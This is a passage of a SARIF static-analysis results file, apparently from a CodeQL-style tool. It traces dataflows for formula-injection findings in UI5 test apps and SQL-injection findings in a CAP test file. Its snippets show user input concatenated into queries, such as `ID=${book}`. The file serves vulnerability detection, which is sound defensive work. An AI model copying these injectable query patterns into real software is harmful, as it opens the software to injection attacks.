150 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 146 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 145 - }, - "region" : { - "startLine" : 8, - "startColumn" : 23, - "endColumn" : 38 - } - }, - "message" : { - "text" : "{ type: \"int\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 145 - }, - "region" : { - "startLine" : 17, - "startColumn" : 27, - "endColumn" : 45 - } - }, - "message" : { - "text" : "oControl.getText()" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 150 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-formula-injection", - "rule" : { - "id" : "js/ui5-formula-injection", - "index" : 4, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "The content of a saved file depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 154 - }, - "region" : { - "startLine" : 23, - "startColumn" : 27, - "endColumn" : 39 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "9afa5fd07ee36af6:1", - "primaryLocationStartColumnFingerprint" : "10" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 159 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 155 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 154 - }, - "region" : { - "startLine" : 9, - "startColumn" : 23, - "endColumn" : 41 - } - }, - "message" : { - "text" : "{ type: \"string\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 154 - }, - "region" : { - "startLine" : 15, - "startColumn" : 29, - "endColumn" : 47 - } - }, - "message" : { - "text" : "oControl.getText()" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 154 - }, - "region" : { - "startLine" : 15, - "startColumn" : 21, - "endColumn" : 47 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 154 - }, - "region" : { - "startLine" : 17, - "startColumn" : 53, - "endColumn" : 58 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 154 - }, - "region" : { - "startLine" : 17, - "startColumn" : 46, - "endColumn" : 59 - } - }, - "message" : { - "text" : "String(value)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 154 - }, - "region" : { - "startLine" : 17, - "startColumn" : 36, - "endColumn" : 60 - } - }, - "message" : { - "text" : "encodeX ... value))" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 154 - }, - "region" : { - "startLine" : 17, - "startColumn" : 21, - "endColumn" : 60 - } - }, - "message" : { - "text" : "xssSanitized" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 154 - }, - "region" : { - "startLine" : 23, - "startColumn" : 27, - "endColumn" : 39 - } - }, - "message" : { - "text" : "xssSanitized" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 159 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-formula-injection", - "rule" : { - "id" : "js/ui5-formula-injection", - "index" : 4, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "The content of a saved file depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 163 - }, - "region" : { - "startLine" : 16, - "startColumn" : 23, - "endColumn" : 51 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "e701acdf85af03b4:1", - "primaryLocationStartColumnFingerprint" : "10" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 166 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 163 - }, - "region" : { - "startLine" : 10, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 163 - }, - "region" : { - "startLine" : 16, - "startColumn" : 23, - "endColumn" : 51 - } - }, - "message" : { - "text" : "oModel. ... input')" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 166 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/cap-sql-injection", - "rule" : { - "id" : "js/cap-sql-injection", - "index" : 0, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "This query depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 13, - "startColumn" : 36, - "endColumn" : 41 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "e5ae8639cd6967fb:1", - "primaryLocationStartColumnFingerprint" : "29" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 42 - } - }, - "message" : { - "text" : "req.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 31 - } - }, - "message" : { - "text" : "{ book, quantity }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 15, - "endColumn" : 19 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 42 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 12, - "startColumn" : 50, - "endColumn" : 54 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 12, - "startColumn" : 44, - "endColumn" : 56 - } - }, - "message" : { - "text" : "`ID=${book}`" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 12, - "startColumn" : 19, - "endColumn" : 57 - } - }, - "message" : { - "text" : "SELECT. ... book}`)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 12, - "startColumn" : 11, - "endColumn" : 57 - } - }, - "message" : { - "text" : "query" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 13, - "startColumn" : 36, - "endColumn" : 41 - } - }, - "message" : { - "text" : "query" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/cap-sql-injection", - "rule" : { - "id" : "js/cap-sql-injection", - "index" : 0, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "This query depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 15, - "startColumn" : 27, - "endColumn" : 65 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "b41554298e90b620:1", - "primaryLocationStartColumnFingerprint" : "20" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 42 - } - }, - "message" : { - "text" : "req.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 31 - } - }, - "message" : { - "text" : "{ book, quantity }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 15, - "endColumn" : 19 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 42 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 15, - "startColumn" : 58, - "endColumn" : 62 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 15, - "startColumn" : 52, - "endColumn" : 64 - } - }, - "message" : { - "text" : "`ID=${book}`" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 15, - "startColumn" : 27, - "endColumn" : 65 - } - }, - "message" : { - "text" : "SELECT. ... book}`)" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/cap-sql-injection", - "rule" : { - "id" : "js/cap-sql-injection", - "index" : 0, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "This query depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 18, - "startColumn" : 37, - "endColumn" : 43 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "967d7be3edc97a9e:1", - "primaryLocationStartColumnFingerprint" : "30" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 42 - } - }, - "message" : { - "text" : "req.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 31 - } - }, - "message" : { - "text" : "{ book, quantity }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 15, - "endColumn" : 19 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 42 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 17, - "startColumn" : 53, - "endColumn" : 57 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 17, - "startColumn" : 45, - "endColumn" : 57 - } - }, - "message" : { - "text" : "'ID=' + book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 17, - "startColumn" : 20, - "endColumn" : 58 - } - }, - "message" : { - "text" : "SELECT. ... + book)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 17, - "startColumn" : 11, - "endColumn" : 58 - } - }, - "message" : { - "text" : "query2" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 18, - "startColumn" : 37, - "endColumn" : 43 - } - }, - "message" : { - "text" : "query2" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/cap-sql-injection", - "rule" : { - "id" : "js/cap-sql-injection", - "index" : 0, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "This query depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 20, - "startColumn" : 27, - "endColumn" : 65 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "1c132adaa6986472:1", - "primaryLocationStartColumnFingerprint" : "20" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 42 - } - }, - "message" : { - "text" : "req.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 31 - } - }, - "message" : { - "text" : "{ book, quantity }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 15, - "endColumn" : 19 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 42 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 20, - "startColumn" : 60, - "endColumn" : 64 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 20, - "startColumn" : 52, - "endColumn" : 64 - } - }, - "message" : { - "text" : "'ID=' + book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 20, - "startColumn" : 27, - "endColumn" : 65 - } - }, - "message" : { - "text" : "SELECT. ... + book)" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/cap-sql-injection", - "rule" : { - "id" : "js/cap-sql-injection", - "index" : 0, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "This query depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 28, - "startColumn" : 39, - "endColumn" : 42 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "144d55d233768c80:1", - "primaryLocationStartColumnFingerprint" : "32" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 42 - } - }, - "message" : { - "text" : "req.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 31 - } - }, - "message" : { - "text" : "{ book, quantity }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 15, - "endColumn" : 19 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 42 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 27, - "startColumn" : 59, - "endColumn" : 63 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : 